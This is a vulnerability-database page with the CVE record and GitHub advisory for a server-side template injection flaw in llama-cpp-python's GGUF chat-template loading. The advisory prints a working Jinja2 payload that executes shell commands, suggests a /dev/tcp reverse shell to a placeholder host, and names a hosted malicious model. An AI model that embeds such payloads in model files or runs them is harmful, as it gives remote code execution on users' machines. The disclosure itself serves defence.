Vulnerability-Lookup

CVE-2024-34359 (GCVE-0-2024-34359)

Vulnerability from cvelistv5 – Published: 2024-05-10 17:07 – Updated: 2024-08-02 02:51

Title

llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata

Summary

llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.

Severity ?

9.7 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CWE

CWE-76 - Improper Neutralization of Equivalent Special Elements

Assigner

GitHub_M

References

URL

Tags

	https://github.com/abetlen/llama-cpp-python/secur…	x_refsource_CONFIRM
	https://github.com/abetlen/llama-cpp-python/commi…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	abetlen	llama-cpp-python	Affected: >= 0.2.30, <= 0.2.71

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:abetlen:llama-cpp-python:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "llama-cpp-python",
            "vendor": "abetlen",
            "versions": [
              {
                "lessThanOrEqual": "0.2.71",
                "status": "affected",
                "version": "0.2.30",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-34359",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-15T19:35:24.408358Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-06T18:29:15.313Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T02:51:10.739Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829"
          },
          {
            "name": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "llama-cpp-python",
          "vendor": "abetlen",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.2.30, \u003c= 0.2.71"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.7,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-76",
              "description": "CWE-76: Improper Neutralization of Equivalent Special Elements",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-05-10T17:07:18.850Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829"
        },
        {
          "name": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df"
        }
      ],
      "source": {
        "advisory": "GHSA-56xg-wfcc-g829",
        "discovery": "UNKNOWN"
      },
      "title": "llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-34359",
    "datePublished": "2024-05-10T17:07:18.850Z",
    "dateReserved": "2024-05-02T06:36:32.439Z",
    "dateUpdated": "2024-08-02T02:51:10.739Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "descriptions": "[{\"lang\": \"en\", \"value\": \"llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.\"}, {\"lang\": \"es\", \"value\": \"llama-cpp-python son los enlaces de Python para llama.cpp. `llama-cpp-python` depende de la clase `Llama` en `llama.py` para cargar `.gguf` llama.cpp o modelos de aprendizaje autom\\u00e1tico de latencia. El constructor `__init__` integrado en `Llama` toma varios par\\u00e1metros para configurar la carga y ejecuci\\u00f3n del modelo. Adem\\u00e1s de `NUMA, configuraci\\u00f3n de LoRa`, `carga de tokenizadores` y `configuraci\\u00f3n de hardware`, `__init__` tambi\\u00e9n carga la `plantilla de chat` desde los metadatos `.gguf` espec\\u00edficos y adem\\u00e1s la analiza en `llama_chat_format.Jinja2ChatFormatter.to_chat_handler ()` para construir el `self.chat_handler` para este modelo. Sin embargo, `Jinja2ChatFormatter` analiza la `plantilla de chat` dentro del Metadate con `jinja2.Environment` sin zona de pruebas, que adem\\u00e1s se representa en `__call__` para construir el `mensaje` de interacci\\u00f3n. Esto permite la inyecci\\u00f3n de plantilla del lado del servidor `jinja2`, lo que conduce a la ejecuci\\u00f3n remota de c\\u00f3digo mediante un payload cuidadosamente construida.\"}]",
      "id": "CVE-2024-34359",
      "lastModified": "2024-11-21T09:18:30.130",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\", \"baseScore\": 9.6, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 6.0}]}",
      "published": "2024-05-14T15:38:45.093",
      "references": "[{\"url\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Awaiting Analysis",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-76\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-34359\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-05-14T15:38:45.093\",\"lastModified\":\"2024-11-21T09:18:30.130\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.\"},{\"lang\":\"es\",\"value\":\"llama-cpp-python son los enlaces de Python para llama.cpp. `llama-cpp-python` depende de la clase `Llama` en `llama.py` para cargar `.gguf` llama.cpp o modelos de aprendizaje autom\u00e1tico de latencia. El constructor `__init__` integrado en `Llama` toma varios par\u00e1metros para configurar la carga y ejecuci\u00f3n del modelo. Adem\u00e1s de `NUMA, configuraci\u00f3n de LoRa`, `carga de tokenizadores` y `configuraci\u00f3n de hardware`, `__init__` tambi\u00e9n carga la `plantilla de chat` desde los metadatos `.gguf` espec\u00edficos y adem\u00e1s la analiza en `llama_chat_format.Jinja2ChatFormatter.to_chat_handler ()` para construir el `self.chat_handler` para este modelo. Sin embargo, `Jinja2ChatFormatter` analiza la `plantilla de chat` dentro del Metadate con `jinja2.Environment` sin zona de pruebas, que adem\u00e1s se representa en `__call__` para construir el `mensaje` de interacci\u00f3n. Esto permite la inyecci\u00f3n de plantilla del lado del servidor `jinja2`, lo que conduce a la ejecuci\u00f3n remota de c\u00f3digo mediante un payload cuidadosamente construida.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\",\"baseScore\":9.6,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-76\"}]}],\"references\":[{\"url\":\"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"name\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"name\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T02:51:10.739Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-34359\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-05-15T19:35:24.408358Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:abetlen:llama-cpp-python:*:*:*:*:*:*:*:*\"], \"vendor\": \"abetlen\", \"product\": \"llama-cpp-python\", \"versions\": [{\"status\": \"affected\", \"version\": \"0.2.30\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"0.2.71\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-05-15T19:53:45.656Z\"}}], \"cna\": {\"title\": \"llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata\", \"source\": {\"advisory\": \"GHSA-56xg-wfcc-g829\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 9.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"abetlen\", \"product\": \"llama-cpp-python\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 0.2.30, \u003c= 0.2.71\"}]}], \"references\": [{\"url\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"name\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"name\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-76\", \"description\": \"CWE-76: Improper Neutralization of Equivalent Special Elements\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-05-10T17:07:18.850Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-34359\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-08-02T02:51:10.739Z\", \"dateReserved\": \"2024-05-02T06:36:32.439Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-05-10T17:07:18.850Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-56XG-WFCC-G829

Vulnerability from github – Published: 2024-05-13 14:10 – Updated: 2024-05-20 22:24

Summary

llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata

Details

Description

llama-cpp-python depends on class Llama in llama.py to load .gguf llama.cpp or Latency Machine Learning Models. The __init__ constructor built in the Llama takes several parameters to configure the loading and running of the model. Other than NUMA, LoRa settings, loading tokenizers, and hardware settings, __init__ also loads the chat template from targeted .gguf 's Metadata and furtherly parses it to llama_chat_format.Jinja2ChatFormatter.to_chat_handler() to construct the self.chat_handler for this model. Nevertheless, Jinja2ChatFormatter parse the chat template within the Metadate with sandbox-less jinja2.Environment, which is furthermore rendered in __call__ to construct the prompt of interaction. This allows jinja2 Server Side Template Injection which leads to RCE by a carefully constructed payload.

Source-to-Sink

`llama.py` -> `class Llama` -> `init`:

class Llama:
    """High-level Python wrapper for a llama.cpp model."""

    __backend_initialized = False

    def __init__(
        self,
        model_path: str,
        # lots of params; Ignoring
    ):

        self.verbose = verbose

        set_verbose(verbose)

        if not Llama.__backend_initialized:
            with suppress_stdout_stderr(disable=verbose):
                llama_cpp.llama_backend_init()
            Llama.__backend_initialized = True

        # Ignoring lines of unrelated codes.....

        try:
            self.metadata = self._model.metadata()
        except Exception as e:
            self.metadata = {}
            if self.verbose:
                print(f"Failed to load metadata: {e}", file=sys.stderr)

        if self.verbose:
            print(f"Model metadata: {self.metadata}", file=sys.stderr)

        if (
            self.chat_format is None
            and self.chat_handler is None
            and "tokenizer.chat_template" in self.metadata
        ):
            chat_format = llama_chat_format.guess_chat_format_from_gguf_metadata(
                self.metadata
            )

            if chat_format is not None:
                self.chat_format = chat_format
                if self.verbose:
                    print(f"Guessed chat format: {chat_format}", file=sys.stderr)
            else:
                template = self.metadata["tokenizer.chat_template"]
                try:
                    eos_token_id = int(self.metadata["tokenizer.ggml.eos_token_id"])
                except:
                    eos_token_id = self.token_eos()
                try:
                    bos_token_id = int(self.metadata["tokenizer.ggml.bos_token_id"])
                except:
                    bos_token_id = self.token_bos()

                eos_token = self._model.token_get_text(eos_token_id)
                bos_token = self._model.token_get_text(bos_token_id)

                if self.verbose:
                    print(f"Using gguf chat template: {template}", file=sys.stderr)
                    print(f"Using chat eos_token: {eos_token}", file=sys.stderr)
                    print(f"Using chat bos_token: {bos_token}", file=sys.stderr)

                self.chat_handler = llama_chat_format.Jinja2ChatFormatter(
                    template=template,
                    eos_token=eos_token,
                    bos_token=bos_token,
                    stop_token_ids=[eos_token_id],
                ).to_chat_handler()

        if self.chat_format is None and self.chat_handler is None:
            self.chat_format = "llama-2"
            if self.verbose:
                print(f"Using fallback chat format: {chat_format}", file=sys.stderr)

In llama.py, llama-cpp-python defined the fundamental class for model initialization parsing (Including NUMA, LoRa settings, loading tokenizers, and stuff ). In our case, we will be focusing on the parts where it processes metadata; it first checks if chat_format and chat_handler are None and checks if the key tokenizer.chat_template exists in the metadata dictionary self.metadata. If it exists, it will try to guess the chat format from the metadata. If the guess fails, it will get the value of chat_template directly from self.metadata.self.metadata is set during class initialization and it tries to get the metadata by calling the model's metadata() method, after that, the chat_template is parsed into llama_chat_format.Jinja2ChatFormatter as params which furthermore stored the to_chat_handler() as chat_handler

`llama_chat_format.py` -> `Jinja2ChatFormatter`:

self._environment = jinja2.Environment( -> from_string(self.template) -> self._environment.render(

class ChatFormatter(Protocol):
    """Base Protocol for a chat formatter. A chat formatter is a function that
    takes a list of messages and returns a chat format response which can be used
    to generate a completion. The response can also include a stop token or list
    of stop tokens to use for the completion."""

    def __call__(
        self,
        *,
        messages: List[llama_types.ChatCompletionRequestMessage],
        **kwargs: Any,
    ) -> ChatFormatterResponse: ...


class Jinja2ChatFormatter(ChatFormatter):
    def __init__(
        self,
        template: str,
        eos_token: str,
        bos_token: str,
        add_generation_prompt: bool = True,
        stop_token_ids: Optional[List[int]] = None,
    ):
        """A chat formatter that uses jinja2 templates to format the prompt."""
        self.template = template
        self.eos_token = eos_token
        self.bos_token = bos_token
        self.add_generation_prompt = add_generation_prompt
        self.stop_token_ids = set(stop_token_ids) if stop_token_ids is not None else None

        self._environment = jinja2.Environment(
            loader=jinja2.BaseLoader(),
            trim_blocks=True,
            lstrip_blocks=True,
        ).from_string(self.template)

    def __call__(
        self,
        *,
        messages: List[llama_types.ChatCompletionRequestMessage],
        functions: Optional[List[llama_types.ChatCompletionFunction]] = None,
        function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,
        tools: Optional[List[llama_types.ChatCompletionTool]] = None,
        tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,
        **kwargs: Any,
    ) -> ChatFormatterResponse:
        def raise_exception(message: str):
            raise ValueError(message)

        prompt = self._environment.render(
            messages=messages,
            eos_token=self.eos_token,
            bos_token=self.bos_token,
            raise_exception=raise_exception,
            add_generation_prompt=self.add_generation_prompt,
            functions=functions,
            function_call=function_call,
            tools=tools,
            tool_choice=tool_choice,
        )

As we can see in llama_chat_format.py -> Jinja2ChatFormatter, the constructor __init__ initialized required members inside of the class; Nevertheless, focusing on this line:

        self._environment = jinja2.Environment(
            loader=jinja2.BaseLoader(),
            trim_blocks=True,
            lstrip_blocks=True,
        ).from_string(self.template)

Fun thing here: llama_cpp_python directly loads the self.template (self.template = template which is the chat template located in the Metadate that is parsed as a param) via jinja2.Environment.from_string( without setting any sandbox flag or using the protected immutablesandboxedenvironmentclass. This is extremely unsafe since the attacker can implicitly tell llama_cpp_python to load malicious chat template which is furthermore rendered in the __call__ constructor, allowing RCEs or Denial-of-Service since jinja2's renderer evaluates embed codes like eval(), and we can utilize expose method by exploring the attribution such as __globals__, __subclasses__ of pretty much anything.

    def __call__(
        self,
        *,
        messages: List[llama_types.ChatCompletionRequestMessage],
        functions: Optional[List[llama_types.ChatCompletionFunction]] = None,
        function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,
        tools: Optional[List[llama_types.ChatCompletionTool]] = None,
        tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,
        **kwargs: Any,
    ) -> ChatFormatterResponse:
        def raise_exception(message: str):
            raise ValueError(message)

        prompt = self._environment.render( # rendered!
            messages=messages,
            eos_token=self.eos_token,
            bos_token=self.bos_token,
            raise_exception=raise_exception,
            add_generation_prompt=self.add_generation_prompt,
            functions=functions,
            function_call=function_call,
            tools=tools,
            tool_choice=tool_choice,
        )

Exploiting

For our exploitation, we first downloaded qwen1_5-0_5b-chat-q2_k.gguf of Qwen/Qwen1.5-0.5B-Chat-GGUF on huggingface as the base of the exploitation, by importing the file to Hex-compatible editors (In my case I used the built-in Hex editor or vscode), you can try to search for key chat_template (imported as template = self.metadata["tokenizer.chat_template"] in llama-cpp-python):

qwen1_5-0_5b-chat-q2_k.gguf appears to be using the OG role+message and using the fun jinja2 syntax. By first replacing the original chat_template in \x00, then inserting our SSTI payload. We constructed this payload which firstly iterates over the subclasses of the base class of all classes in Python. The expression ().__class__.__base__.__subclasses__() retrieves a list of all subclasses of the basic object class and then we check if its warning by if "warning" in x.__name__, if it is , we access its module via the _module attribute then access Python's built-in functions through __builtins__ and uses the __import__ function to import the os module and finally we called os.popen to touch /tmp/retr0reg, create an empty file call retr0reg under /tmp/

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("touch /tmp/retr0reg")}}{%endif%}{% endfor %}

in real life exploiting instance, we can change touch /tmp/retr0reg into arbitrary codes like sh -i >& /dev/tcp/<HOST>/<PORT> 0>&1 to create a reverse shell connection to specified host, in our case we are using touch /tmp/retr0reg to showcase the exploitability of this vulnerability.

After these steps, we got ourselves a malicious model with an embedded payload in chat_template of the metahead, in which will be parsed and rendered by llama.py:class Llama:init -> self.chat_handler-> llama_chat_format.py:Jinja2ChatFormatter:init -> self._environment = jinja2.Environment( -> `llama_chat_format.py:Jinja2ChatFormatter:call -> self._environment.render(

(The uploaded malicious model file is in https://huggingface.co/Retr0REG/Whats-up-gguf )

from llama_cpp import Llama

# Loading locally:
model = Llama(model_path="qwen1_5-0_5b-chat-q2_k.gguf")
# Or loading from huggingface:
model = Llama.from_pretrained(
    repo_id="Retr0REG/Whats-up-gguf",
    filename="qwen1_5-0_5b-chat-q2_k.gguf",
    verbose=False
)

print(model.create_chat_completion(messages=[{"role": "user","content": "what is the meaning of life?"}]))

Now when the model is loaded whether as Llama.from_pretrained or Llama and chatted, our malicious code in the chat_template of the metahead will be triggered and execute arbitrary code.

PoC video here: https://drive.google.com/file/d/1uLiU-uidESCs_4EqXDiyKR1eNOF1IUtb/view?usp=sharing

Severity ?

9.6 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.71"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "llama-cpp-python"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.2.30"
            },
            {
              "fixed": "0.2.72"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-34359"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-76"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-13T14:10:18Z",
    "nvd_published_at": "2024-05-14T15:38:45Z",
    "severity": "CRITICAL"
  },
  "details": "## Description\n\n`llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to RCE by a carefully constructed payload.\n\n## Source-to-Sink\n\n### `llama.py` -\u003e `class Llama` -\u003e `__init__`:\n\n```python\nclass Llama:\n    \"\"\"High-level Python wrapper for a llama.cpp model.\"\"\"\n\n    __backend_initialized = False\n\n    def __init__(\n        self,\n        model_path: str,\n\t\t# lots of params; Ignoring\n    ):\n \n        self.verbose = verbose\n\n        set_verbose(verbose)\n\n        if not Llama.__backend_initialized:\n            with suppress_stdout_stderr(disable=verbose):\n                llama_cpp.llama_backend_init()\n            Llama.__backend_initialized = True\n\n\t\t# Ignoring lines of unrelated codes.....\n\n        try:\n            self.metadata = self._model.metadata()\n        except Exception as e:\n            self.metadata = {}\n            if self.verbose:\n                print(f\"Failed to load metadata: {e}\", file=sys.stderr)\n\n        if self.verbose:\n            print(f\"Model metadata: {self.metadata}\", file=sys.stderr)\n\n        if (\n            self.chat_format is None\n            and self.chat_handler is None\n            and \"tokenizer.chat_template\" in self.metadata\n        ):\n            chat_format = llama_chat_format.guess_chat_format_from_gguf_metadata(\n                self.metadata\n            )\n\n            if chat_format is not None:\n                self.chat_format = chat_format\n                if self.verbose:\n                    print(f\"Guessed chat format: {chat_format}\", file=sys.stderr)\n            else:\n                